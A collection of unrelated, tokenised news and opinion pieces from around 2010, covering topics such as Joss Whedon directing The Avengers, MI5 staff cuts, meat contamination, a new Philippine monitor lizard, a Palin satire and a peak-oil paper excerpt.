This will be Whedon 's second feature directorial effort and his first film since 2005 's Serenity , the big - screen resolution to his short - lived but much - loved space drama Firefly .
He 's low on cinematic experience , but considering how Whedon has excelled at directing casts full of ass - kicking heroes , who better than the creator of Buffy the Vampire Slayer to get Iron Man , Captain America , the Incredible Hulk and Thor in shape for a May 4 , 2012 , release date ?
Robert Downey Jr. , Chris Evans ( who recently was tapped for Captain America ) , Chris Hemsworth ( Thor himself ) and Samuel L. Jackson ( as Nick Fury ) are all expected to star in the film , and Marvel is hoping to get Edward Norton to go green as the Hulk one more time , as well .
SAN JOSE , Calif . -- Update from Monday 's Detroit Red Wings practice at the HP Pavilion :
Defenseman Niklas Kronwall skated and said he felt good and will play Tuesday against the Sharks .
Kronwall got a scare early in overtime during Sunday 's 2 - 1 shootout loss in Pittsburgh , when he banged his left knee into Jordan Staal 's knee .
Kronwall missed the rest of the OT .
" When I woke this morning , even last night after the flight , it felt a lot better than what I thought it would be , '' Kronwall said .
" I think I 'll be fine . ''
Kronwall sprained his MCL in the same knee on a knee - on - knee check from Montreal 's Georgres Laraque on Nov. 21 and missed nearly 10 weeks .
" Once you 've been injured and you get hit on it the first time , you panic , '' coach Mike Babcock said .
" You can't blame a guy , you think you 've been out all this time and here we go again . ''
Tomas Holmstrom will return to action after missing 13 games with a fractured foot .
" What we need in Homer is he 's got emotion , he 's fired up to play the game , we need that , '' Babcock said .
" I 'm excited he 's coming back .
We need someone to be in front of their net and drive their goalie crazy .
Let 's forget about being on the outside and be on the inside .
Those things are contagious . ''
Here are the lines they practiced with , though Babcock said not to read anything into them , that he split up Pavel Datsyuk and Henrik Zetterberg just to get them skating through the middle of the ice .
Filppula - Datsyuk - Holmstrom ( Franzen working in )
Bertuzzi-Zetterberg - Cleary
Draper -Helm - Eaves
Maltby - Miller - Williams ( May and Leino working in )
The committee oversees the work of MI5 and other security agencies MI5 is ditching staff who lack computer skills in a programme of compulsory and voluntary redundancies .
The Intelligence and Security Committee said the service had been reviewing its staff profile and one area of concern was the level of IT skills .
MI5 director general Jonathan Evans told the committee : " I think some of the staff perhaps are n't quite the ones that we will want for the future . "
It also said MI5 faced cuts because of the state of the public finances .
' Imminent threats ' Patrick Mercer , chairman of Parliament 's counter - terrorism sub-committee , backed the move over computer skills .
He said : " As terrorism changes , counter - terrorism officers have to adapt to keep up .
" Our enemies use every available method to attack including using technology .
" We have to be aware of the imminent threats of cyber attacks and the old generation of MI5 have to be completely comfortable using computers and the latest technology .
"
Mr Mercer added : " There is no room now for the ' old school tie ' or recruitment from just certain Oxbridge colleges .
" We need people from all walks of life who can speak a range of languages and possess certain technical skills . "
The committee oversees the work of the Security Service ( MI5 ) , Secret Intelligence Service ( MI6 ) and the Government Communications Headquarters ( GCHQ ) .
It reports directly to the prime minister , rather than Parliament , and its report is partially censored .
' Skill sets '
Computer security consultant Phil Robinson , who has worked with the government , said he was surprised by the move .
" I know a lot of people who are over 60 who are quite capable of using Facebook and Twitter , " he said .
" A six - year - old can use them , so I 'm sure a 60 - year - old can . "
" It 's important to have computer skills in that line of work , and the UK security services are full of people who have got good computer skill - sets . "
" But it 's an essential part of most jobs .
Just to pick out MI5 is a bit bizarre . "
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Washington ( CNN ) --
The U.S. government is not fully guarding against the contamination of meat by traces of antibiotics , pesticides or heavy metals , a new report warns .
The U.S. Department of Agriculture 's inspector general said federal agencies have failed to set limits on many potentially harmful chemical residues , which " has resulted in meat with these substances being distributed in commerce . "
When it comes to pesticide traces , only one type is tested for , according to the report .
There are also no set limits for some heavy metals , like copper .
In 2008 , Mexican authorities turned away an American shipment of beef , because it did not meet Mexico 's limits when tested for copper traces .
But the very same rejected meat could be sold in the United States , since no limit has been set , the analysis says .
That example shows " the government has fallen down on the job here , " said Tony Corbo of the consumer advocacy group Food and Water Watch .
" Some of the residues that the inspector general cited could be carcinogenic , as they accumulate over a period of time in the body , " he said .
The study focused on contamination by chemical residues , rather than bacteria .
While bacteria like E. coli and Salmonella can cause an illness that is acute but brief , chemical residues are more like to build up over time , and no amount of cooking will destroy them .
The USDA pledged to " swiftly implement the corrective actions " recommended by the inspector , which including testing for more kinds of residue and setting limits on how much of each substance is allowable .
A department spokesman pointed out that this kind of fix , which is expected to require coordination with the FDA and the EPA , was one of the main reasons President Obama created a Food Safety Working Group last year .
The National Cattlemen 's Beef Association said in a statement , " We fully support the critical role of the federal government in ensuring beef safety . "
" While the U.S. beef supply is extraordinarily safe by any nation 's standards , " it added , " the beef industry is constantly looking for ways to improve the systems that ensure the safest product possible for our consumers . "
The study , first reported by USA Today , also says that when cattle test positive for residue , it is difficult to track back where it came from because it often passes through several buyers and sellers .
The American Meat Institute said that problem " underscores the need to implement comprehensive livestock traceback procedures , " with a national animal identification system .
CNN 's Brian Todd contributed to this report .
Changed :
[ IMPORTANT INCOMPATIBILITY ]
IupParamf renamed to IupParam and IupParamBox changed its signature .
They are now actual controls and cab be also used in LED and Lua as such .
In Lua the constructors iup . param{} and iup .
parambox{} must be used instead of the previous functions .
After creating the IupParamBox , IupAppend or IupInsert must be called to insert the box in the parent child list .
There are NO changes for IupGetParam , it is fully backward compatible .
Ever feel like you were playing checkers and the other guy was playing chess ?
That ’s the impression I get when watching many of the recent spate of food documentaries .
Activists announce that this or that is wrong with the food system ; on the rare occasion when something appears to be getting done about it , the folks who are doing things badly simply change their tactics , not their strategy .
That ’s how it ’s gone with the British 2009 documentary film Pig Business .
I watched this film in several 10 - minute segments via YouTube ( Part One ) because it has n’t been released in the U.S. , primarily due to legal pressure brought upon the director ( Tracy Worcester , who spent four years making the film ) by the film ’s main villain , Smithfield Foods .
The world ’s largest pork producer , Smithfield has 52,000 employees processing 27 million pigs per year in 15 countries , accruing annual sales around $ 12 billion .
The UK ’s Channel 4 ran the film last summer despite four letters from Smithfield threatening litigation , but since no U.S. insurer would back the film ’s release here , it has become essentially a black - market film .
Score another one for corporate censorship .
Smithfield does , in one sense , have cause for concern : this film certainly does n’t show their company in the most favorable light .
Right off the bat , the viewer is struck with some rather gruesome images of pigs being brutally mistreated , apparently at the hands of workers in Smithfield - run facilities .
We hear from farmers and neighbors complaining of health problems that they tie to the fumes and water contamination from Smithfield hoglots .
An owner of a small family farm in Poland who this large corporation has pushed out of business says , “ I do n’t know whether I should retire , hang myself , or leave the country . ”
Watch the trailer :
In the early ’90s , there were 27,500 independent pig farmers in Poland .
Today there are 2,200 hoglots , and 1,600 of them are wholly owned by Smithfield Foods .
Each of those factory farms in Poland replaced 10 family farms with two to three minimum - wage jobs .
Smithfield accountants and shareholders might laud the boost to the company ’s bottom line , but one protester in the film asks a different question :
Why is it , when people are in bondage to their government it is called “ tyranny , ” but when the oppressor is a multinational corporation , it is called “ efficiency ? ”
It was precisely this form of “ efficiency ” that the art and social critic John Ruskin had in mind when he said “ There is scarcely anything in the world that some man cannot make a little worse , and sell a little more cheaply .
The person who buys on price alone is this man ’s lawful prey . ”
Smithfield is not the only corporate specimen under Worcester ’s microscope ; she takes large financial institutions to task as well .
In an interview with noted Belgian economist Bernard Lietaer , he points out that Big Finance has its fingers in absolutely everything — making one - third of all political contributions in the United States ( a figure that is sure to only increase in light of the Supreme Court ’s recent decision ) .
Big Money ’s influence , along with that of many other large and wealthy corporations , dictates the type and scope of laws throughout the U.S. and the world .
My daddy used to call this the Golden Rule :
He who has the gold makes the rules .
That influence is precisely what makes the competitive practices of Smithfield ( not to mention many other agribusiness conglomerates ) patently unfair .
As Pig Business points out , if the likes of Smithfield had to pay for the damages they cause , to the environment and to human health , then any small farmer in the world could out - compete them .
But they do n’t , because the game is rigged .
So most of the time , agribusiness will take its profits and steam obliviously onward .
But if anyone points out that the wreckage these companies leave in their wakes , they have scads of lawyers and PR professionals to make certain no one hears .
Watching Pig Business on YouTube is one small way to get past their invisible hand .
Watch Part One of Pig Business >
A version of this post appeared on CivilEats.com .
( CookingLight.com ) --
Spring has arrived , and with longer days and warmer weather comes a new crop of fresh produce .
It 's the perfect season to " spring clean " your diet , so out with the heavy fall and winter fare and in with springtime fruits and veggies .
In - season produce reaps the most nutritional value so here 's what to look for on the produce aisle or at the local farmers ' market .
Strawberries
Strawberries are available year - round in most areas of the country , but their peak season is from April until June .
These sweet , juicy berries are nutritional jewels with just 1 cup offering 3.5 grams of fiber and meeting 100 percent of your daily vitamin C needs .
For the best flavor , buy strawberries grown close to home since they are likely to be fresher and suffer less damage in transit .
Strawberries should be plump , firm , well shaped , and uniformly colored .
A sweet addition to salads , dressings , or even a main meal , strawberries " take the cake " and save your waistline as a light dessert .
View recipe : Strawberries romanoff
Asparagus
Dubbed the " food of kings " by Louis XIV of France , asparagus definitely have a royal nutritional profile .
Low in fat and high in fiber , these tender stalks are a good source of iron , B vitamins , and vitamin C. Asparagus are at their peak from March through June but can be purchased year - round .
Once harvested , asparagus deteriorate rapidly , so place them in cool storage to retain freshness and nutrition .
Delicious roasted , grilled , or lightly sautéed in olive oil , these seasonal spears make a tasty addition to any meal .
View recipe : Grilled asparagus with balsamic vinegar
Sweet Cherries
Succulent sweet cherries are only available during the late spring and early summer , so make sure to enjoy your fill .
Sweet cherries are high in fiber and potassium , while remaining low in calories -- just 1 cup of sweet cherries is about 100 calories .
Cooking Light : 10 foods for strong bones
The intense color of cherries is due partly to their anthocyanin content .
Anthocyanins are a type of plant chemical ( phytochemical ) that are believed to be high in antioxidant activity .
The best cherries are large ( an inch or more in diameter ) , plump , firm , and rich in color and are equally delicious as a snack or dessert .
View recipe : Fresh cherry pie
Peas
Fresh peas including sugar snap peas , snow peas , and green peas can usually be found year - round but are at their peak from April through July .
Like most legumes , peas are low in fat and high in fiber and are a good source of plant protein .
Their nutritional profile differs depending on variety , with green peas providing more B vitamins and zinc , while snow and snap peas offer more vitamin C. Peas are perfect as crudités with dips , tossed in salads , and served as a side dish .
View Recipe : Fava bean , sweet pea , and sugar snap salad
Radishes
For a burst of flavor with very few calories , look no further than the radish .
Radishes are root vegetables with a distinctive flavor that ranges from mild to sharp , depending on variety .
One cup of sliced red radishes will give you 30 percent of your daily vitamin C requirement in less than 25 calories .
Cooking Light : Good news for good fats
To choose the best , pick radishes that are deep in color with solid roots .
This root vegetable is a flavorful addition to soups , condiments , and cooked dishes .
You can also eat the green tops , which lends a peppery taste to salads .
View recipe : nectarine and radish salsa
Beans
With their rich , hearty flavor , fava beans are a terrific addition to soups , salads , or main dishes .
Due to their high protein and fiber content , these beans help to keep you feeling full for longer .
Young favas can be shelled and eaten raw or cooked , but more mature favas must be both shelled and skinned , as the skins are too tough to eat .
View recipe : Fava bean and grilled shrimp salad in radicchio cups
Apricots
For a boost of beta - carotene , potassium , vitamin C , and fiber in a sweet 50 - calorie bundle , be sure to bring home apricots from the farmers ' market or grocery store .
Cooking Light : Healthy office snacks
The peak season for this fresh fruit is from May to August .
Sandwiches , snacks , jams , salsas , and salads will all be just a bit sweeter and delicious with apricots .
View recipe : Fresh apricot chutney
Artichokes
While artichokes are harvested year - round , the crop peaks from March through May .
A 2 - ounce serving ( approximately the size of the bottom of one large artichoke ) has about 3 grams of fiber and just 25 calories .
Artichokes are also a good source of iron , potassium , magnesium , folate , and vitamin C .
Try them served in dips , or bake and toss in pastas or salads .
View recipe : Artichokes with roasted garlic wine dip
Rhubarb
Although technically a vegetable , rhubarb is often used as a fruit and is a good source of vitamin C , potassium , and manganese .
Rhubarb stalks ( the only part of the plant that should be eaten ) are very tart but when sweetened , give rich flavor and texture to sauces and pies .
Rhubarb can also be blanched , diced , and added to salsas and salads .
Rhubarb is available in some locations year - round , however , field - grown varieties are harvested from April through July .
View recipe : Raspberry - rhubarb pie
Mushrooms
Cone - shaped with a spongy texture , morels are a springtime delicacy making an entrance at fine restaurants and farmers ' markets in early spring through late June .
A member of the truffle family , these wild mushrooms are best known for their honeycomb texture and nutty flavor .
The spongy texture of morels make them ideal for soaking up flavorful sauces .
Pair with other spring veggies like asparagus , spring onions , and green peas or toss in pastas , sautés , and salads .
View recipe : Chicken scallopine with morels and spring vegetables
Enter for a chance to win in our $ 5,000 Grocery Giveaway
Copyright 2011 Cooking Light magazine .
All rights reserved .
There ’s nothing the right , particularly the sectarian right , loves more than the the federal constitution , which by their reckoning is an anti-federal power , libertarian document that hearkens back to the days when the Founding Fathers founded the Tea Party movement .
But I ’m not sure there ’s any better example of what nonsense this is , or the way that the ‘ constitution ’ has just become a fetish which automatically represents the rightwing wish - list du jour , than the paranoia and rage against the Census .
If you ’re really devoted to the constitution , by all rights responding to Census should make you something close to giddy since participating in the Census is about as close as you can get to fulfilling an unambiguous and explicit constitutional duty .
For a real constitutionalist , it should be like touching the Pope ’e garment .
But the disconnect between the wingnut fantasy constitution and the actual document actually goes well beyond that .
Certainly liberals and conservatives have their own takes on the constitution .
And outside the extreme margins each take is rooted in some real history .
But what I ’m talking about is the Ron Paul , Tea Party , right - wing sectarian take — the ‘ constitution ’ of Sen.
DeMint ’s imagination — that really does believe that the constitution is a sort of far - right wishlist .
But what ’s even weirder and more problematic in terms of our public discourse is that a lot of journalists seem to buy into this fantasy — at least assume it as a given — even if they do n’t accept the supposed implications .
In other words , ‘ Yes , sure the original constitution is a Paulite , radically small government document .
But hey , we ’re a big country now .
Times change . ’
But this is a complete crock .
The federal constitution does n’t just not perfectly line up with the anti-federal , small government right .
It was actually put into effect precisely to combat the kind of politically philosophy these folks espouses .
It ’s a centralizing document .
It was aimed at making federal power trump that of the states , indeed bringing the states to heel .
The idea that of a genuine heir of the South Carolinian political tradition — which DeMint is — is someone whose views are in tune with the constitution is silly if you spend a few moments cracking a history book .
The big point of the constitution was to create a strong federal government , one with the power to do pretty much all the things the phony constitutionalists are the far - right want to prevent .
Yahoo Sports ' Sean Leahy posted the first two commercials of the NHL's playoff advertising campaign , " History Will be Made , " and neither seeing Bobby Orr score his Cup - winning goal in 1972 ...
Or Mario Lemieux famously undressing Shawn Chambers and Jon Casey ...
Strike me as exciting in reverse , but there 's promise ahead as the campaign will showcase Red Wings legend Steve Yzerman 's double overtime goal against the St. Louis Blues :
That one 's worth repeating .
A Varanus bitatawa , pictured in 2009 in the Philippines .
Scientists reported on the " spectacular " discovery a previously unknown species of fruit - eating lizard as big as a full - grown man .
Astonished researchers found the secretive but brightly - coloured beast , a close cousin of the fearsome Komodo Dragons of Indonesia , in a hard - to - reach river valley of northern Luzon Island in the Philippines .
Biologists on Wednesday reported the spectacular discovery of a species of giant lizard , a reptile as long as a full - grown man is tall , and endowed with a double penis .
The secretive but brightly - coloured beast , a monitor lizard , is a close cousin of the Komodo Dragon of Indonesia .
But unlike the fearsone Dragon , it is not a carnivore , nor does it feast on rotting meat .
Instead , it is entirely peaceable and tucks into fruit .
Dubbed Varanus bitatawa , the lizard measures two metres ( 6.5 feet ) in length , according to the account , published by Britain 's Royal Society .
It was found in a river valley on northern Luzon Island in the Philippines , surviving loss of habitat and hunting by local people who use it for food .
How many of the lizards have survived is unclear .
The species is almost certainly critically endangered , and might well have disappeared entirely without ever being catalogued had a large male specimen not been rescued alive from a hunter last June .
Finding such a distinctive species in a heavily populated , highly deforested location " comes as an unprecedented surprise , " note the authors , writing in the journal Biology Letters .
The only finds of comparable importance in recent decades are the Kipunji monkey , which inhabits a tiny range of forest in Tanzania , and the Saola , a forest - dwelling bovine found only in Vietnam and Laos .
V. bitatawa has unique markings and an unusual sexual anatomy , according to the study .
Its scaly body and legs are a blue - black mottled with pale yellow - green dots , while its tail is marked in alternating segments of black and green .
Males have a double penis , called hemipenes , also found in some snakes and other lizards .
The two penises are often used in alternation , and sometimes contain spines or hooks that serve to anchor the male within the female during intercourse .
V. bitatawa has a relative in southern Luzon , V. olivaceus , but the species are separated by three river valleys and a gap of 150 kilometers ( 95 miles ) and may never have met up .
One reason that the new lizard has gone undetected , the researchers speculate , is that it never leaves the forests of its native Sierra Madre mountains to traverse open spaces .
The discovery " adds to the recognition of the Philippines as a global conservation hotspot and a regional superpower of biodiversity , " the authors conclude .
The giant lizard should become a " flagship species " for conservation efforts aimed at preserving the remaining forests of northern Luzon , which are rapidly disappearing under the pressure of expanding human population and deforestation .
Explore further Rediscovering the dragon 's paradise lost
( c ) 2010 AFP
Gavin de Becker , in his book , Gift of Fear , writes about trusting your instincts and what the consequences are if you do not .
Becker describes numerous cases where people who were victimized initially had a bad feeling , a hunch or noticed that something was not quite right about a person or situation they were in .
Failure to heed this " , " for those he described , led to painful and often tragic consequences .
While revisiting his bestselling book a few weeks ago it reminded me of an event from my past .
While I have had scary moments in my life like most of us , this was one time where I felt ‘ spooked ' for no good reason and had to make a quick decision .
One night as a graduate student I had entered my dormitory and walked in the hallway towards the elevator .
Now , anyone familiar with university settings knows that there are often strangers who come to dorms , so when I saw a guy I had never seen before standing in the lobby by the elevator I paid him no particular .
It was late so there was no one on duty at the front office and I guess the night staff had n't arrived or was on rounds in the building so it was just me and the ' guy ' I did n't know .
As I pressed the button for the elevator I became more aware of him .
It was n't cold outside but he had on a green army field jacket and he had his hands in his coat 's pockets .
If it were the late 70s or early 80s , okay , maybe .
But it was 1999 and unless his name was David Banner or John Rambo it was a total red flag .
That was my first clue .
My second clue came when the elevator doors opened .
I entered the elevator and then he got on right behind me .
Now wait !
Why was this guy standing in the lobby all of this time and had n't already pressed the button for the elevator ?
He should have already been at his destination .
I took one look at him and disembarked from the elevator .
I made a conscious decision that if he stepped off the elevator I would hit him with everything I had and would run for the exit .
Physically , the guy was unimposing .
He was shorter than me , had no muscular build and besides the green army field jacket did n't appear to be a threat .
Besides , I had practiced martial arts since I was eight and at that time I had been boxing five times a week , lifting weights every other day and had been practicing judo for nearly a year .
I was no pushover ( in my mind ) .
But this guy spooked me like the Benjamin Linus character in Lost .
Who knows what would have happened , but I was glad I never had to find out .
He did n't follow me and later I made it safely to my room .
Even though some may consider my plan an extreme tactic , at that moment I felt it was more valuable to heed my instincts in the short run than to suffer lasting consequences .
Besides , in most cases , what 's the worst that could happen by paying attention to first impressions caused by ?
You may just embarrass yourself from jumping to a conclusion .
Oh well !
* I am not advocating punching or using violence on strangers because they give you the jitters .
Bakari Akil II , Ph.D. is the author of Super You !
101 Ways to Maximize your Potential !
You can also check out his page on Twitter .
Those Palin supporters not swallowed up by sudden fissures in the earth 's crust remained to chant anti-Democratic slogans .
IDAHO FALLS , ID — Speaking unto an audience of anti-immigration advocates , global - warming deniers , and members of the Tea Party Nation , former Alaska governor and vice presidential candidate Sarah Palin gave forth utterances Monday that reportedly opened the sixth seal of the Book of the Apocalypse .
Advertisement
" Wow , it 's good to be here , just shootin ' the breeze with a bunch of real , hardworking Americans who love their freedom , " said Palin , her words echoing across the Idaho Falls Civic Auditorium as mighty tremors caused great unrest beneath the land and the sea .
" So are the little guys like you and me gonna fight these Washington insiders with their big government agenda ?
You betcha we are ! "
And lo , there was then a great earthquake ; and the sun became black as sackcloth of hair ; and the moon became as blood ; and " gosh " was spoken repeatedly ; and the stars of heaven fell upon the earth , even as a fig tree casteth her untimely figs , when she is shaken by a mighty wind .
Advertisement
And the 10th mention of " small town folk " brought forth a great belching chasm of death and dust .
These disturbances reportedly went unnoticed by the audience , however , as their thunderous applause drowned out the sound of the foretold cataclysm .
Advertisement
" This Tea Party movement just goes to show ya that America is ready for another revolution , " Palin said as things long ago divined came finally to pass .
" Who do you think is gonna stand up for the freedoms promised by our Founding Fathers ?
Folks like us , or some socialist professor of constitutional law in the Oval Office ? "
It was then , witnesses claim , that there was a tearing of the heavens , and the skies receded as does a scroll when it is rolled up , and anecdotes about everyday middle - class Alaskan families were enunciated in down - to - earth tones .
Advertisement
" That 's right , partner , " Palin said , as every mountain and island moved from its place , and flames overtook the lakes and the rivers and the seas .
" Thanks , but no thanks . "
According to biblical scholars , the opening of the seven seals described in the Book of Revelation will usher in the End Times , the Tribulation , the reign of the Antichrist , and the eventual salvation of the 144,000 chosen few .
It is thought that the sixth seal 's opening will bring about the full fury of God , leading ultimately to the Day of Wrath .
Advertisement
" Admittedly , this is not what we were expecting , " said Robert Harwood , a doctor of divinity at the University of Cambridge .
" The Bible speaks of a beast with seven horns and seven eyes , not a raven - haired woman from the north who knows not what foolishness she speaks of . "
" Still , there 's no denying it , " Harwood added .
" The End of Days is upon us . "
One member of the crowd not torn apart by swarming harpies told reporters he feared living in a country where his daughters would grow up speaking Spanish and not be allowed to carry handguns .
Advertisement
" Palin for president ! " Bill Coleman , 37 , of Topeka , KS chanted , and the stench of flesh rotting in the belly of Satan rose up , and the stench of death rose up .
" Sarah Palin for president ! "
" Small town folks — the folks who grow our food , run our small businesses , and teach our kids — are getting pretty riled up by President Obama 's big socialist ideas , " Palin spoke as the stage upon which she stood was rent apart by an unseen hand , opening as unto a great chasm , whose gaping void she narrowly escaped by clinging to the podium .
Advertisement
" Uh …how 's that hopey - changey stuff workin ' out for ya ? " Palin added .
Chaos and disorder then spread across hill and valley to every corner of the earth , eyewitnesses reported , and as the minions of the Antichrist prepared for their millennium of world dominion , even the teeming masses of heathens could not in their hearts deny that the final phase of Armageddon was close at hand , and that you 're darn right Joe Six - Pack pays too many taxes already .
Advertisement
The Antichrist , whose true identity remained unknown as of press time , will reportedly come to torment the sinners of humanity as soon as the seventh and last remaining seal is opened .
" I 'm so happy that we 've got the liberal left running scared , " Palin concluded .
" Because whatever the TV pundits might want you to think , from where I 'm standing , the future looks really good . "
Better than a strike : Spanish cabin crew give BA a lesson in gaining public sympathy
Now that 's how you grab the public 's attention .
Never mind going on strike and disrupting everyone 's travel plans , these air crew workers have stripped off to highlight their cause .
Attention - grabbing : Cabin crew workers have posed naked to publicise their cause
Flight attendants working for the now - defunct Spanish Air Comet say they were not paid for up to nine months before the airline was grounded in December and claim they are still waiting for a pay - off .
So nine female flight attendants stripped off to pose provocatively for an aircraft - themed calendar .
Ready for take - off :
The nude images have been picked up by the Spanish national media
Their nude images - taken in cabins , the cockpit and even on the top of a jet turbine - have certainly caught the public 's attention as they have been featured in numerous Spanish newspapers .
Attendant turned model Adriana Ricardo said : ' We are just demanding our rights to receive what is ours , we each have eight or nine months of unpaid salaries . '
Service with a smile :
The calendar is certainly a better way to gain public sympathy than industrial action
The company is said to owe around 160 million euros in total with a reported seven million owed in wages to its workers .
Crew members hope the calendar will raise some money as well as put pressure on Air Comet to find a solution .
Working hard :
The girls hope the calendar will earn them some money
DETROIT – Sedrick Staten ’s family came here from Alabama in 1969 .
He ’s been driving a Detroit school bus for 18 years .
A member of Teamsters Local 214 , his livelihood is being threatened because of the school privatization efforts of Robert Bobb , emergency financial manager of Detroit Public Schools , appointed by Gov. Jennifer Granholm .
Staten ’s story is moving .
“ I ’ve been a loyal Detroit public school person all my life , ” he said .
“ My mother was a custodian for 30 years , my brothers , my sisters , my whole family have always been affiliated with Detroit public schools .
If I lose my job , it ’s going to make me think about moving out of Detroit .
My kids love their schools .
But if Daddy does n’t have a job , what am I supposed to do ? ”
Staten joined hundreds of other school workers , many with similar stories , at a rally at Bobb ’s office .
Rose Gant is a secretary at Webster Elementary School , and a member of the Detroit Association of Educational Office Employees , an affiliate of the American Federation of Teachers .
She is fighting hard against the drastic cuts Bobb is pushing .
“ He wants us to take pay cuts , insurance cuts and retirement cuts , ” Gant said .
“ We can not get enough supplies in the buildings . ”
Standing outside the school system ’s administrative offices , Gant said the money should be spent in the schools instead of “ down here . ”
A special education aide who has worked for 10 years at the Mae C. Jemison School said Bobb wants her and her coworkers to take a 10 percent pay cut .
“ We do n’t make any money now and he ’s trying to take more , ” she said .
“ It ’s going to be harder , much harder if they take more and give us less . ”
Beth Thoreson , from AFT Michigan , said Bobb has threatened to privatize office employees , the first people anybody sees when coming into a school .
“ The people who are rallying today are the people that hold the whole school system together – the teachers would n’t be able to do their job if it were n’t for them , ” she said .
“ To outsource those jobs is to take away their ability to live in the city .
Most of them do , and their kids go to school here , ” Thoreson said .
The typical school office employee has worked on the job for 15 years and earns $ 25,000 .
Privatization is not the answer because in the long run it does n’t save money , she said .
“ To privatize the jobs of people who live in the city , that support other businesses in the city , becomes a vicious cycle .
It ’s not just an impact on the schools ; it ’s an impact on the entire city . ”
She also raised a concern shared by others : “ Specialists have been brought in at huge amounts of money that could keep a number of these people at their jobs . ”
Former Detroit Federation of Teachers President Virginia Cantrell , who now serves on the school board advisory council , said , “ We need to get the class size down , books and supplies in the classroom , and we need to stop moving teachers around , four , five , six times a year .
All that needs to be done are things that are common sense . ”
She objected to Bobb trying to both be a financial manager and oversee academics .
“ None of us is smart enough to take on everything and be the master of everything .
There ’s no check and balances . ”
The elected school board , not Bobb , needs to oversee academics , in her view .
Russ Bellant , a retired labor and community activist long engaged in the fight to preserve public education , said Bobb is embarking on a systematic plan to dismantle public education in the city .
Up to 45 schools are scheduled to close .
What needs to be done is to keep the schools open and fill them with students , instead of closing them , he said .
Michael Mulholland , secretary treasurer of AFSCME Local 207 representing Detroit ’s water and sewage workers , came to the rally because his union is also fighting a privatization effort that could affect upwards of 13,000 workers .
Photo : PW / John Rummel
We begin with the state of globalised civilisation that we argued in sec : 4.1 has been in a relatively stable dynamical state for the last century and a half or so .
In its broadest outline we might say that declining energy flows reduce economic activity which further reduce energy flows .
A series of increasingly severe processes are set in train which start to cause cascading collapse in major hub infrastructures and the operational fabric of the global economy .
These processes have different time - scales , some could evolve over years , some could be relatively abrupt but because of coupling between them , the faster processes are likely to lead the overall collapse rate .
We currently live within an integrated complex globalised economy .
We have framed the process in which this occurs as a catastrophic bifurcation , driven by a series of reinforcing positive feedbacks ( sec : 4.2 ) .
The final point will be a de-globalised ( localised ) economy of much reduced complexity .
Recently , a 55 page paper called Tipping Point : Near - Term Implications of a Peak in Global Oil Production ( PDF warning ) was published as the joint effort of two organizations : Feasta and The Risk / Resilience Network , with lead author David Korowicz .
We have recently published three excerpts from that paper , which can be found at this link .
This is a fourth excerpt .
6.2 Monetary System & Debt
6.2.1 Credit in the Economy
Credit in its various guises is the unifying embedded structure in the global economy .
Credit underpins our monetary system , investment financing , government deficit financing , trade deficits , Letters of Credit , the bond market , corporate and personal debt .
Credit and the promise of future economic growth support our stock market , production , employment and much else besides .
It is the primary institutional infrastructure of the global economy .
The money flowing through our economy has been created through the issuance of debt [ 56 ]
Money enters the economy when banks create money in return for the promise to repay that debt with interest at some time in the future .
All positive balances in our accounts , except for a very small percentage reserve , are lent out to others at interest .
Debt and money are the mirror of each other .
If we all paid back the money we owed , there would be no money left in circulation , and the interest on the debt would be left unpaid .
Money supply is the balance between loans being taken out , and loans and interest being repaid .
At any time , the money supply is insufficient to repay the total amount of debt outstanding with interest .
In order to pay back loans in aggregate , more loans must be taken out for consumption and investment than the repayment of old loans .
Thus in order for debt to be repaid , money supply must increase year - on - year .
This can be done either by increasing GDP and / or inflation .
Our monetary system depends on continually increasing debt outstanding and GDP for its stability .
Bank reserves represent much less than 10 % of money owed to depositors by banks , which means they do not have the money to repay their debts to their depositors .
This implies a strong level of collective trust : when we lose trust , bank - runs can ensue , potentially collapsing the banking system .
If we lose the banking system , the society wide implications for welfare can be severe .
In general , shocks of this kind can be transmitted and absorbed by governments , central banks , society at large , and international institutions .
This too implies a level of trust in the adaptive capacity of globalised networks to contain the damage and prevent contagion .
Local shocks can in general be contained , but because of the level of integration and tight coupling some shocks can rapidly rattle the world as the current crisis attests .
At the core trust in monetary system is largely assumed throughout the globalised world .
But with the loss of that trust , the system 's ability to absorb the shock is lost , for the system depends upon that trust .
Further , that trust depends upon continued economic growth , because only by growth can the devastation of hyper- inflation , deflation , and monetary collapse be avoided .
The economist Paul Seabright sees trust as a central underpinning of the global monetary system , and thus the trade networks upon which we rely [ 57 ] .
Trust between unrelated humans outside our own tribal networks cannot be taken for granted ( would you trade with a random stranger across the globe and send real money or goods without the reassurance of some guarantee of honest completion or ability to punish a defaulter ? ) .
Because trade is in general , to all our benefit , we have developed institutions of trust and deterrence ( ' good standing ' , legal systems , the IMF , banking regulations , insurance against fraud , and the World Trade Organisation etc ) to reinforce cooperation and deter freeloaders .
Trust builds compliance , which confers benefits , which then builds trust .
But the reverse is also true , a breakdown in trust can cause defections from compliance further reducing trust .
6.2.2 Credit & Monetary Collapse
Increasing debt , and thus money supply , without a corresponding increase in GDP , leads to a devaluation of money 's purchasing power which is inflation .
But increasing GDP requires increasing energy and material flows .
With an energy contraction , the economy must contract .
In a growing economy , debt can be paid off on average , as the growing ' pie ' allows the payment of the principle plus interest .
In a permanently contracting economy , the shrinking pie cannot cover even the repayment of the principle .
Another way of putting it is that reducing energy flows cannot maintain the economic production required to service debt .
All the money in the world could not repay debt outstanding -- mass default or hyper- inflation are the only ways out .
Credit , the life - blood of economies must dry up .
This means that we are moving into a period of extreme monetary uncertainty , framed by the global economic crisis ’s intersection with energy constraints and its consequences .
We would expect a continuation or initiation of deflationary trends within economies .
That is , money supply decreases , and that in turn causes prices to drop relative to goods and services produced .
This is firstly because increasing spare production capacity and fears of future business failures and job losses reduce demand for new loans .
Lower production and margins in the economy increase the relative debt burden which puts further pressure on consumer , corporate , and government borrowing .
Even though people and companies may continue to service their loans , growing bad debts may force banks to write off their capital , the basis of their ability to make new loans under the fractional reserve banking system .
Perceptions of future risk will reduce consumption and increase interest rates , further stalling economic activity .
This deflationary process is self - reinforcing .
Under normal recessionary conditions , governments might step in to maintain demand and liquidity through deficit spending or quantitative easing .
But underlying such initiatives is the assumption that growth will return facilitating the repayment of sovereign loans and acting to mop up excess liquidity .
At this moment , increasing concern is being expressed over the risks of sovereign defaults , commercial property defaults , and credit card defaults .
If we assume that as time goes on , the implications of an energy withdrawal become clearer to some potential creditors , one might expect rising interest rates , loans having shorter terms , and eventually the absolute refusal to finance most loans .
Why lend more to someone who will not be able to repay the loans they already have outstanding ?
